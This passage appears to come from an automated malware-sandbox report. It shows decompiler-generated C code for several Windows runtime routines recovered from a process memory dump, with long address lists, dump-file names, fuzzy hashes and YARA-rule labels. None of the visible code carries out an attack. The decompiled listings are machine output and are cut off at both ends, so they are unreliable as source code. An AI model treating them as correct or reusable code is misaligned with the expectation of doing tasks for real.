					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E033D3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E033DB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x033b4128
0x033b4135
0x033b413c
0x033b4141
0x033b4145
0x033b4147
0x033b414e
0x033b4151
0x033b4159
0x033b415c
0x033b4160
0x033b4164
0x033b4168
0x033b416c
0x033b417f
0x033b4181
0x033b446a
0x033b446a
0x033b418c
0x033b4195
0x033b4199
0x033b4432
0x033b4439
0x033b443d
0x033b4442
0x033b4447
0x00000000
0x033b419f
0x033b41a3
0x033b41b1
0x033b41b9
0x033b41bd
0x033b45db
0x033b45db
0x00000000
0x033b41c3
0x033b41c3
0x033b41ce
0x033b41d4
0x033fe138
0x033fe13e
0x033fe169
0x033fe16d
0x033fe19e
0x033fe16f
0x033fe16f
0x033fe175
0x033fe179
0x033fe18f
0x033fe193
0x00000000
0x033fe199
0x00000000
0x033fe199
0x033fe193
0x00000000
0x00000000
0x00000000
0x033b41da
0x033b41da
0x033b41df
0x033b41e4
0x033b41ec
0x033b4203
0x033b4207
0x033fe1fd
0x033b4222
0x033b4226
0x033fe1f3
0x033fe1f3
0x033b422c
0x033b422c
0x033b4233
0x033fe1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x033b4239
0x033b4239
0x033b4239
0x033b4239
0x033b4233
0x033b4226
0x033b41ee
0x033b41ee
0x033b41f4
0x033b4575
0x033fe1b1
0x033fe1b1
0x00000000
0x033b457b
0x033b457b
0x033b4582
0x033fe1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x033b4588
0x033b4588
0x033b458c
0x033fe1c4
0x033fe1c4
0x00000000
0x033b4592
0x033b4592
0x033b4599
0x033fe1be
0x00000000
0x00000000
0x00000000
0x00000000
0x033b459f
0x033b459f
0x033b45a3
0x033fe1d7
0x033fe1e4
0x00000000
0x033b45a9
0x033b45a9
0x033b45b0
0x033fe1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x033b45b6
0x033b45b6
0x033b45b6
0x00000000
0x033b45b6
0x033b45b0
0x033b45a3
0x033b4599
0x033b458c
0x033b4582
0x00000000
0x00000000
0x00000000
0x00000000
0x033b41f4
0x033b423e
0x033b4241
0x033b45c0
0x033b45c4
0x00000000
0x033b45ca
0x033b45ca
0x00000000
0x033fe207
0x033fe20f
0x00000000
0x00000000
0x00000000
0x00000000
0x033b45d1
0x00000000
0x00000000
0x033b45ca
0x00000000
0x033b4247
0x033b4247
0x033b4247
0x033b4249
0x033b4249
0x033b4249
0x033b4251
0x033b4251
0x033b4257
0x033b425f
0x033b426e
0x033b4270
0x033b427a
0x033fe219
0x033fe219
0x033b4280
0x033b4282
0x033b4456
0x033b45ea
0x00000000
0x033b45f0
0x033fe223
0x00000000
0x033fe223
0x033b445c
0x033b445c
0x00000000
0x033b445c
0x00000000
0x033b4288
0x033b428c
0x033fe298
0x033b4292
0x033b4292
0x033b429e
0x033b42a3
0x033b42a7
0x033b42ac
0x033fe22d
0x033b42b2
0x033b42b2
0x033b42b9
0x033b42bc
0x033b42c2
0x033b42ca
0x033b42cd
0x033b42cd
0x033b42d4
0x033b433f
0x033b433f
0x033b42d6
0x033b42d6
0x033b42d9
0x033b42dd
0x033b42eb
0x033fe23a
0x033b42f1
0x033b4305
0x033b430d
0x033b4315
0x033b4318
0x033b431f
0x033b4322
0x033b432e
0x033b433b
0x033b433b
0x00000000
0x033b432e
0x033b42eb
0x033b434c
0x033b434e
0x033b4352
0x033b4359
0x033b435e
0x033b4361
0x033b436e
0x033b438a
0x033b438e
0x033b4396
0x033b439e
0x033b43a1
0x033b43ad
0x033b43bb
0x033b43bb
0x033b43ad
0x033b436e
0x033b43bf
0x033b43c5
0x033b4463
0x033b4463
0x033b43ce
0x033b43d5
0x033b43d9
0x033b43df
0x033b4475
0x033b4479
0x033b4491
0x033b4491
0x033b4479
0x033b43e5
0x033b43eb
0x033b43f4
0x033b43f6
0x033b43f9
0x033b43fc
0x033b43ff
0x033b44e8
0x033b44ed
0x033b44f3
0x033fe247
0x00000000
0x033b44f9
0x033b4504
0x033b4508
0x033b450f
0x033fe269
0x00000000
0x033b4515
0x033b4519
0x033b4531
0x033b4534
0x033b4537
0x033b453e
0x033b4541
0x033b454a
0x033fe255
0x033fe255
0x033fe25b
0x033fe25e
0x033fe261
0x033fe261
0x033b4555
0x033b4559
0x033b455d
0x033fe26d
0x033fe270
0x033fe274
0x033fe27d
0x033fe28e
0x033fe28e
0x033b4563
0x033b4563
0x033b4569
0x033b4569
0x00000000
0x033b455d
0x033b450f
0x00000000
0x033b44f3
0x033b43ff
0x033b4405
0x033b4405
0x033b4405
0x033b42ac
0x033b428c
0x033b4282
0x033b4407
0x033b440d
0x033fe2af
0x033fe2af
0x033b4413
0x033b4413
0x00000000
0x033b41d4
0x00000000
0x033b41c3
0x033b41bd
0x033b4415
0x033b4415
0x033b4416
0x033b4417
0x033b4429
0x033b416e
0x033b416e
0x033b4175
0x033b4498
0x033b449f
0x033fe12d
0x00000000
0x033fe133
0x00000000
0x033fe133
0x033b44a5
0x033b44a5
0x033b44aa
0x00000000
0x033b44bb
0x033b44ca
0x033b44d6
0x033b44d7
0x033b44d8
0x033b44e3
0x033b44e3
0x033b44aa
0x033b417b
0x033b417b
0x033b417b
0x00000000
0x033b417b
0x033b4175
0x00000000

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3863a9cd711e340570552fa3c18df622898ba287e5b1bb74a91a8fe10e98ebf
Instruction ID: db7481f6359c5af8d54092018bf3cb9fcbc72825906f1ba296d59a40597bcd43
Opcode Fuzzy Hash: e3863a9cd711e340570552fa3c18df622898ba287e5b1bb74a91a8fe10e98ebf
Instruction Fuzzy Hash: BBF17D749083118FC724DF1AC8C0A7AB7F5EF88704F48496EF6868BA61E734D991CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0339B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0339B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x346f7a8);
				E033ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E033ED130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E033DD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E033DF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											E033EDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E033DB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E033DB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E033DE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E033DA890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x0339b171
0x0339b171
0x0339b171
0x0339b171
0x0339b171
0x0339b176
0x0339b17b
0x0339b180
0x0339b186
0x0339b18f
0x0339b198
0x0339b1a4
0x0339b1aa
0x033f4802
0x033f4802
0x033f4805
0x033f480c
0x033f480e
0x0339b1d1
0x0339b1d3
0x0339b1de
0x0339b1de
0x033f4817
0x033f481e
0x033f4820
0x033f4822
0x033f4822
0x033f4824
0x033f4824
0x033f482a
0x00000000
0x00000000
0x033f4835
0x033f483a
0x033f483d
0x033f483f
0x033f4842
0x033f4842
0x033f4842
0x033f4846
0x033f484c
0x033f484e
0x033f4851
0x033f4851
0x033f4853
0x033f4854
0x033f4854
0x033f4858
0x033f485a
0x033f485a
0x033f485d
0x033f485f
0x033f4861
0x033f4861
0x033f4866
0x033f486b
0x033f486e
0x033f4871
0x033f4876
0x033f4876
0x033f4878
0x033f487b
0x033f4884
0x033f4884
0x00000000
0x033f487d
0x033f487d
0x033f4882
0x033f4889
0x033f4889
0x033f488f
0x033f4891
0x033f48e0
0x033f48e2
0x033f48e4
0x033f48e4
0x033f48e7
0x033f48e7
0x033f48ed
0x033f48f4
0x033f48f6
0x033f4951
0x033f4951
0x033f4953
0x033f4953
0x033f4956
0x033f4956
0x033f4958
0x033f4959
0x033f4959
0x033f495d
0x033f495d
0x033f495f
0x033f495f
0x033f4965
0x033f4969
0x033f49ba
0x033f49ba
0x033f49c1
0x033f49c5
0x033f49cc
0x033f49d4
0x033f49d7
0x033f49da
0x033f49e4
0x033f49e5
0x033f49f3
0x033f4a02
0x00000000
0x033f4a02
0x033f4972
0x033f4974
0x00000000
0x00000000
0x033f4976
0x033f4979
0x033f4982
0x033f4983
0x033f4984
0x033f498b
0x033f498d
0x033f4991
0x033f4993
0x033f4999
0x033f499d
0x033f49a2
0x033f49a2
0x033f49a2
0x033f4999
0x033f49ac
0x00000000
0x033f49b3
0x033f48f8
0x033f48fe
0x00000000
0x00000000
0x00000000
0x033f48fe
0x033f4895
0x033f489c
0x033f48ad
0x033f48b2
0x033f48b5
0x033f48b7
0x033f48ba
0x033f48bc
0x033f48c6
0x033f48c6
0x033f48cb
0x033f48d1
0x033f48d4
0x033f48d8
0x033f48d8
0x00000000
0x033f48d8
0x033f48be
0x033f48c0
0x00000000
0x00000000
0x033f48c2
0x00000000
0x00000000
0x00000000
0x033f48c4
0x00000000
0x033f4882
0x033f487b
0x033f4904
0x033f4906
0x00000000
0x00000000
0x033f4908
0x033f490e
0x00000000
0x00000000
0x033f4910
0x033f4917
0x033f4917
0x00000000
0x033f4917
0x0339b1ba
0x033f47f9
0x033f47fc
0x00000000
0x00000000
0x00000000
0x033f47fc
0x0339b1c0
0x0339b1c0
0x0339b1c3
0x0339b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 033F48AD

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 65b1edc1d81d68365472bc56d04aace1571517fb65c5a5e85b5e13fd7b43d51a
Instruction ID: 7fa05fb184996788a10417f342db984427317005e3882ed8cd20449dd9533a3a
Opcode Fuzzy Hash: 65b1edc1d81d68365472bc56d04aace1571517fb65c5a5e85b5e13fd7b43d51a
Instruction Fuzzy Hash: 6A51F076E042598EEF30CF69C8C4BAFBBB4BF00710F5841ADE959AB281D73549818B91

Uniqueness

Uniqueness Score: -1.00%

Function 033BB944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E033BB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x348d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E033B7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E03468CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E033D9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E033DB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E033DCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E033B7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E03468F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E033DAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x3488628; // 0x0
								_v68 = _t77;
								_t78 =  *0x348862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x3488628; // 0x0
							_t116 =  *0x348862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x033bb94c
0x033bb956
0x033bb95c
0x033bb95e
0x033bb964
0x033bb969
0x033bb96d
0x033bb96d
0x033bb970
0x033bb974
0x033bb97a
0x033bbadf
0x033bbadf
0x033bbae2
0x033bbae4
0x033bbae6
0x033bbaf0
0x03402cb8
0x033bbaf6
0x033bbaf6
0x033bbaf6
0x033bbafd
0x033bbb1f
0x033bbb1f
0x033bbaff
0x033bbb00
0x033bbb00
0x033bbb03
0x033bbb03
0x033bbacb
0x033bbacf
0x033bbad0
0x033bbad1
0x033bbadc
0x033bbadc
0x033bb980
0x033bb980
0x033bb988
0x033bb98b
0x033bb98d
0x033bb990
0x033bb993
0x033bb999
0x033bb99b
0x033bb9a1
0x033bb9a5
0x033bb9aa
0x033bb9b0
0x033bb9bb
0x033bb9c0
0x033bb9c3
0x033bb9ca
0x033bb9cc
0x033bb9cf
0x033bb9d3
0x033bb9d7
0x033bba94
0x033bba94
0x033bba98
0x033bbaa3
0x03402ccb
0x033bbaa9
0x033bbaa9
0x033bbaa9
0x033bbab1
0x03402cd5
0x03402cdd
0x03402cdd
0x033bbabb
0x033bbabc
0x033bbac2
0x033bbac3
0x033bbac3
0x033bbac6
0x00000000
0x033bb9dd
0x033bb9dd
0x033bb9e7
0x033bb9e7
0x033bb9ec
0x033bb9ec
0x033bb9f1
0x033bb9f5
0x033bb9fa
0x033bba00
0x033bba0c
0x033bba10
0x033bba10
0x033bba12
0x033bba18
0x00000000
0x00000000
0x033bbb26
0x033bbb26
0x033bba1e
0x033bba1e
0x033bba23
0x033bba25
0x033bba2c
0x033bba30
0x033bba35
0x033bba35
0x033bba41
0x033bba46
0x033bba4c
0x033bba50
0x033bba54
0x033bba6a
0x033bba6e
0x033bba70
0x033bba74
0x033bba78
0x033bba7a
0x033bba7c
0x033bba8e
0x033bba90
0x033bba92
0x033bbb14
0x033bbb14
0x033bbb16
0x033bbb16
0x00000000
0x033bba7c
0x033bbb0a
0x033bbb0d
0x00000000
0x00000000
0x00000000
0x033bbb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 033BB9A5

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 6915c879eb1018bf603d03d087d552634b2df01501565b6b5334e2486128ce3c
Instruction ID: 16298a56bf3e9dcc466b3fad6435b3637661eb476607bd64fbd2522720d0d785
Opcode Fuzzy Hash: 6915c879eb1018bf603d03d087d552634b2df01501565b6b5334e2486128ce3c
Instruction Fuzzy Hash: 32515871A08344CFC720DF29C4C096AFBF9FB88640F58496EE6959BB54DB71E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 033CE730, Relevance: 1.6, APIs: 1, Instructions: 89
nativeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E033CE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				void _v8;
				signed char _v20;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				if(NtQueryInformationProcess(0xffffffff, 0x24,  &_v8, 4, 0) < 0) {
					E033EDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v20;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x3487b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L033B4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M033CE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x033ce730
0x033ce749
0x033ce765
0x033ce76a
0x033ce76b
0x033ce76c
0x033ce76d
0x033ce76e
0x033ce76f
0x033ce775
0x033ce777
0x033ce77e
0x0340b675
0x033ce784
0x033ce784
0x033ce789
0x033ce7a8
0x033ce7ac
0x033ce807
0x033ce7ae
0x033ce7ae
0x033ce7b1
0x033ce7b4
0x033ce7b9
0x033ce7c0
0x033ce7c4
0x033ce7ca
0x033ce7cc
0x00000000
0x033ce7d3
0x033ce7d6
0x00000000
0x00000000
0x033ce7ff
0x033ce802
0x00000000
0x00000000
0x033ce7f9
0x033ce7fc
0x00000000
0x00000000
0x033ce7f3
0x033ce7f6
0x00000000
0x00000000
0x033ce7ed
0x033ce7f0
0x00000000
0x00000000
0x033ce7e7
0x033ce7ea
0x00000000
0x00000000
0x0340b685
0x0340b688
0x00000000
0x00000000
0x0340b682
0x00000000
0x00000000
0x033ce7cc
0x033ce7d9
0x033ce7dc
0x033ce7de
0x033ce7de
0x033ce7ac
0x033ce7e4
0x033ce74b
0x033ce751
0x033ce759
0x033ce761
0x033ce761

APIs

NtQueryInformationProcess.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(000000FF,00000024,00000000,00000004,00000000,?,?,0342FFD5,034709D0,00000338,033EFA4A,00000000,00000004,?,00000000,?), ref: 033CE742

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001InformationProcess.0000001Query
String ID:
API String ID: 1489403242-0
Opcode ID: db8c25940a79ca5bd7e2af370b22362ad1b6ff4cfc5755afb67a3404a0e84a58
Instruction ID: e8078bcabb02096c62b8510fd6cb1b5350282341395c12bafbda99f213d1ad6e
Opcode Fuzzy Hash: db8c25940a79ca5bd7e2af370b22362ad1b6ff4cfc5755afb67a3404a0e84a58
Instruction Fuzzy Hash: 65316D75A14349AFD744CF58D881F9ABBE8FB09315F14826AF904CB741D631ED90CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 033CFAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E033CFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
